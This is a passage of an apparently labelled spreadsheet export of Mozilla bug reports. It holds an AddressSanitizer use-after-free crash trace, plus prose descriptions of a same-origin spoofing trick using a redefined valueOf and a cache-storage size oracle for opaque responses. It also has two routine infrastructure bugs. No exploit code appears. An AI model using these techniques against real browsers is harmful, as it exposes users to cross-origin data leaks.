    #0 0x7fcc5a0b2a59 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12
    #1 0x7fcc5a0b2a59 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:526
    #2 0x7fcc5a0b2a59 in GetPrimaryFrame /home/worker/workspace/build/src/dom/base/nsIContent.h:916
    #3 0x7fcc5a0b2a59 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:964
    #4 0x7fcc5a0b2a59 in mozilla::dom::Element::GetPrimaryFrame(mozFlushType) /home/worker/workspace/build/src/dom/base/Element.cpp:2197
    #5 0x7fcc5c5182c7 in mozilla::dom::ImageDocument::UpdateSizeFromLayout() /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:625:28
    #6 0x7fcc5c5180d8 in mozilla::dom::ImageDocument::OnPageShow(bool, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:288:3
    #7 0x7fcc5e36661b in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1058:9
    #8 0x7fcc5f109f4b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7635:5
    #9 0x7fcc5f105d54 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7439:7
    #10 0x7fcc5f10d3bf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7336:13
    #11 0x7fcc5930d290 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #12 0x7fcc5930c228 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #13 0x7fcc59308f88 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #14 0x7fcc5930b084 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #15 0x7fcc5930bc3c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #16 0x7fcc578621fa in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #17 0x7fcc5a2fe696 in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
    #18 0x7fcc5a2fdf6e in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8568:9
    #19 0x7fcc5d5e5be8 in nsBindingManager::DoProcessAttachedQueue() /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:404:5
    #20 0x7fcc5d645d92 in applyImpl&lt;nsBindingManager, void (nsBindingManager::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #21 0x7fcc5d645d92 in apply&lt;nsBindingManager, void (nsBindingManager::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #22 0x7fcc5d645d92 in mozilla::detail::RunnableMethodImpl&lt;void (nsBindingManager::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #23 0x7fcc576828bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #24 0x7fcc577049fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #25 0x7fcc584bc40f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #26 0x7fcc5842dfc8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #27 0x7fcc5842dfc8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #28 0x7fcc5842dfc8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #29 0x7fcc5da5719f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #30 0x7fcc5fad1451 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #31 0x7fcc5fc68757 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #32 0x7fcc5fc69ecd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #33 0x7fcc5fc6ad8c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #34 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #35 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #36 0x7fcc7303182f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #37 0x41ba88 in _start (/home/nils/fuzzer3/esr/firefox/firefox+0x41ba88)
0x61200021e8f0 is located 48 bytes inside of 280-byte region [0x61200021e8c0,0x61200021e9d8)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fcc5754b354 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7fcc5754af46 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7fcc5755201e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7fcc575514dc in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7fcc57555556 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7fcc5a3e7b19 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7fcc59f1555d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
    #8 0x7fcc576aaec6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7fcc58ecdfbe in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
    #10 0x7fcc58ecdfbe in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
    #11 0x7fcc58ecdfbe in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
    #12 0x7fcc58ed5648 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:999:12
    #13 0x7fcc621252e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7fcc621252e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7fcc621056ef in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #16 0x7fcc621056ef in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7fcc620ea8ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #18 0x7fcc6212594f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #19 0x7fcc62125f92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #20 0x7fcc61bf4ec2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #21 0x7fcc58df68af in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7fcc621252e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7fcc621252e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #24 0x7fcc621056ef in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #25 0x7fcc621056ef in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7fcc620ea8ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #27 0x7fcc6212594f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #28 0x7fcc62125f92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7fcc61e9460c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7fcc61e63f5f in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #31 0x7fcc61e7172f in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7fcc61e73ede in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7fcc621252e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7fcc621252e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7fcc62125f92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #36 0x7fcc61bf712d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fcc5c3aca3d in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fcc5c3aca3d in NS_NewHTMLImageElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLImageElement.cpp:55
    #4 0x7fcc5c5171cf in mozilla::dom::ImageDocument::CreateSyntheticDocument() /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:665:19
    #5 0x7fcc5c515a9e in mozilla::dom::ImageDocument::SetScriptGlobalObject(nsIScriptGlobalObject*) /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:256:9
    #6 0x7fcc59f6e811 in nsGlobalWindow::SetNewDocument(nsIDocument*, nsISupports*, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:2994:3
    #7 0x7fcc5e35da70 in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:915:14
    #8 0x7fcc5e35ccb7 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:655:10
    #9 0x7fcc5f1034b2 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9407:7
    #10 0x7fcc5f101bb9 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7260:17
    #11 0x7fcc5f0948af in nsDocShell::CreateContentViewer(nsACString_internal const&amp;, nsIRequest*, nsIStreamListener**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9212:3
    #12 0x7fcc5f091841 in nsDSURIContentListener::DoContent(nsACString_internal const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /home/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:128:10
    #13 0x7fcc59319f4d in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:736:17
    #14 0x7fcc59316250 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:414:30
    #15 0x7fcc593150b0 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:277:8
    #16 0x7fcc5780e51b in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:809:14
    #17 0x7fcc5785a13e in nsInputStreamPump::OnStateStart() /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:524:14
    #18 0x7fcc57859632 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:426:25
    #19 0x7fcc57637a0d in nsInputStreamReadyEvent::Run() /home/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:95:9
    #20 0x7fcc576828bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #21 0x7fcc577049fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #22 0x7fcc584bc40f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #23 0x7fcc5842dfc8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #24 0x7fcc5842dfc8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #25 0x7fcc5842dfc8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #26 0x7fcc5da5719f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #27 0x7fcc5fad1451 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #28 0x7fcc5fc68757 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #29 0x7fcc5fc69ecd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #30 0x7fcc5fc6ad8c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #31 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #32 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #33 0x7fcc7303182f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c248003bcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248003bcd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c248003bce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c248003bcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c248003bd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c248003bd10: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd
  0x0c248003bd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248003bd30: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c248003bd40: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c248003bd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c248003bd60: 00 00 00 00 00 00 00 00 00 00 00 00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4974==ABORTING</t>
        </is>
      </c>
      <c r="X5103" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5104">
      <c r="A5104" t="n">
        <v>800666</v>
      </c>
      <c r="B5104" t="inlineStr">
        <is>
          <t>2012-10-11 18:03:32 -0700</t>
        </is>
      </c>
      <c r="C5104" t="inlineStr">
        <is>
          <t>Location can be spoofed using |valueOf|</t>
        </is>
      </c>
      <c r="D5104" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:53 -0700</t>
        </is>
      </c>
      <c r="E5104" t="n">
        <v>1</v>
      </c>
      <c r="F5104" t="n">
        <v>1</v>
      </c>
      <c r="G5104" t="n">
        <v>3</v>
      </c>
      <c r="H5104" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5104" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5104" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5104" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L5104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5104" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5104" t="inlineStr">
        <is>
          <t>[Must Land in 17.0]</t>
        </is>
      </c>
      <c r="Q5104" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5104" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5104" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5104" t="n">
        <v>1</v>
      </c>
      <c r="U5104" t="n">
        <v>0</v>
      </c>
      <c r="V5104" t="n">
        <v>23</v>
      </c>
      <c r="W5104" t="inlineStr">
        <is>
          <t>Created attachment 670644
Proof of concept
When Adobe Flash Player checks the page location to apply the SOP, it reads the return value of javascript:top.location+"__flashplugin_unique__". When an object is joined with a string, its |valueOf| method is called before |toString|, and content can redefine the former.
This appears to have regressed in Firefox v16.0.1.</t>
        </is>
      </c>
      <c r="X5104" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5105">
      <c r="A5105" t="n">
        <v>1738426</v>
      </c>
      <c r="B5105" t="inlineStr">
        <is>
          <t>2021-10-29 03:41:09 -0700</t>
        </is>
      </c>
      <c r="C5105" t="inlineStr">
        <is>
          <t>Allow opaque 206 responses into the cache</t>
        </is>
      </c>
      <c r="D5105" t="inlineStr">
        <is>
          <t>2024-04-28 23:34:45 -0700</t>
        </is>
      </c>
      <c r="E5105" t="n">
        <v>1</v>
      </c>
      <c r="F5105" t="n">
        <v>1</v>
      </c>
      <c r="G5105" t="n">
        <v>3</v>
      </c>
      <c r="H5105" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5105" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5105" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5105" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5105" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5105" t="inlineStr">
        <is>
          <t>[adv-main119+]</t>
        </is>
      </c>
      <c r="Q5105" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5105" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5105" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T5105" t="n">
        <v>1</v>
      </c>
      <c r="U5105" t="n">
        <v>0</v>
      </c>
      <c r="V5105" t="n">
        <v>17</v>
      </c>
      <c r="W5105" t="inlineStr">
        <is>
          <t>Ben Kelly from Google reached out to us about this.
&gt; This problem relates to how we handle range requests in cache_storage.  Today we reject whenever you attempt to store a 206 in cache_storage.  See step 6 here:
&gt;
&gt; https://w3c.github.io/ServiceWorker/#cache-put
&gt;
&gt; And step 4.7 here:
&gt; https://w3c.github.io/ServiceWorker/#cache-addAll
&gt;
&gt; Confusingly the put language uses the inner response, but that is not done in the addAll language.  In implementation, however, we do use the inner response in all cases.  (I believe the spec intended to use inner response in all cases as well.)
&gt; 
&gt; This unfortunately allows one to infer some information about an opaque response being stored in cache_storage.  If code makes a no-cors range request and then tries to put it in cache storage, if the put rejects then the code can infer that the opaque response is a 206.
&gt; 
&gt; This oracle then allows an attacker to iteratively probe the range of a server provided response.  They simply increase their range size bit by bit until they discover that the server returns something other than a 206.  This allows them to detect the size of an opaque response.
&gt; 
&gt; Unfortunately it appears servers handle out-of-range requests differently.  Some return 416, but others return 200.  I think this means we cannot simply also forbid 416 responses.
&gt; 
&gt; I think the only solution we have here is to not block 206 opaque responses.  I think this is probably ok as simply an extension of the "you can't tell if this is a 200 or 404 anyway" footgun already present in opaque responses.
In the email thread I observed that there's also a problem with the `Vary` header. It seems attackers can learn its contents. If we cannot address that here a follow-up bug needs to be filed.
There's also the more general problem of the Cache API being broken around opaque responses. I'm not sure if there are other problems hiding there. It would be good to double check that.</t>
        </is>
      </c>
      <c r="X5105" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5106">
      <c r="A5106" t="n">
        <v>1214966</v>
      </c>
      <c r="B5106" t="inlineStr">
        <is>
          <t>2015-10-14 18:14:02 -0700</t>
        </is>
      </c>
      <c r="C5106" t="inlineStr">
        <is>
          <t>Proper SMTP account for PulseGuardian</t>
        </is>
      </c>
      <c r="D5106" t="inlineStr">
        <is>
          <t>2017-03-05 12:02:43 -0800</t>
        </is>
      </c>
      <c r="E5106" t="n">
        <v>1</v>
      </c>
      <c r="F5106" t="n">
        <v>1</v>
      </c>
      <c r="G5106" t="n">
        <v>4</v>
      </c>
      <c r="H5106" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5106" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J5106" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K5106" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5106" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5106" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5106" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5106" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5106" t="inlineStr"/>
      <c r="Q5106" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5106" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5106" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5106" t="n">
        <v>1</v>
      </c>
      <c r="U5106" t="n">
        <v>0</v>
      </c>
      <c r="V5106" t="n">
        <v>2</v>
      </c>
      <c r="W5106" t="inlineStr">
        <is>
          <t>While doing the migration to Heroku, I just used my Mozilla mail account since we could no longer access Mozilla's SMTP server.  We should use one of the Heroku email add-ons.</t>
        </is>
      </c>
      <c r="X5106" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5107">
      <c r="A5107" t="n">
        <v>1349525</v>
      </c>
      <c r="B5107" t="inlineStr">
        <is>
          <t>2017-03-22 05:01:47 -0700</t>
        </is>
      </c>
      <c r="C5107" t="inlineStr">
        <is>
          <t>Thunderbird 52.0 build4: failed at thunderbird_release_updates</t>
        </is>
      </c>
      <c r="D5107" t="inlineStr">
        <is>
          <t>2017-03-25 14:47:00 -0700</t>
        </is>
      </c>
      <c r="E5107" t="n">
        <v>1</v>
      </c>
      <c r="F5107" t="n">
        <v>1</v>
      </c>
      <c r="G5107" t="n">
        <v>5</v>
      </c>
      <c r="H5107" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5107" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5107" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K5107" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5107" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5107" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5107" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5107" t="inlineStr"/>
      <c r="Q5107" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5107" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5107" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5107" t="n">
        <v>1</v>
      </c>
      <c r="U5107" t="n">
        <v>0</v>
      </c>
      <c r="V5107" t="n">
        <v>5</v>
      </c>
      <c r="W5107" t="inlineStr">
        <is>
          <t>per rail...
This** is because 45.8.0 was listed in partials but it is not in https://hg.mozilla.org/build/tools/file/tip/release/patcher-configs/mozEsr52-thunderbird-branch-patcher2.cfg.
To fix the issue we need to:
1) add &lt;45.8.0&gt; release entry to the config above (the following hunk: https://hg.mozilla.org/build/tools/rev/b95282e941f7#l1.96)
2) add the "post-update" change from the same commit: https://hg.mozilla.org/build/tools/rev/b95282e941f7#l1.78
3) retag the changes and rerun the step
** https://archive.mozilla.org/pub/thunderbird/candidates/52.0-candidates/build4/logs/release-comm-esr52-thunderbird_release_updates-bm74-build1-build0.txt.gz
Traceback (most recent call last):
  File "tools/scripts/updates/create-update-verify-configs.py", line 106, in &lt;module&gt;
    pc = PatcherConfig(open(options.config).read())
  File "/builds/slave/tb-rel-c-esr52-tb_rel_upds-000/tools/lib/python/release/updates/patcher.py", line 44, in __init__
    self.readXml(cfg)
  File "/builds/slave/tb-rel-c-esr52-tb_rel_upds-000/tools/lib/python/release/updates/patcher.py", line 228, in readXml
    self['current-update']['from'])
release.updates.patcher.PatcherConfigError: No release found for version '45.8.0'
State Changed: unlock buildroot
program finished with exit code 1
elapsedTime=21.109042</t>
        </is>
      </c>
      <c r="X5107" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5108">
      <c r="A5108" t="n">
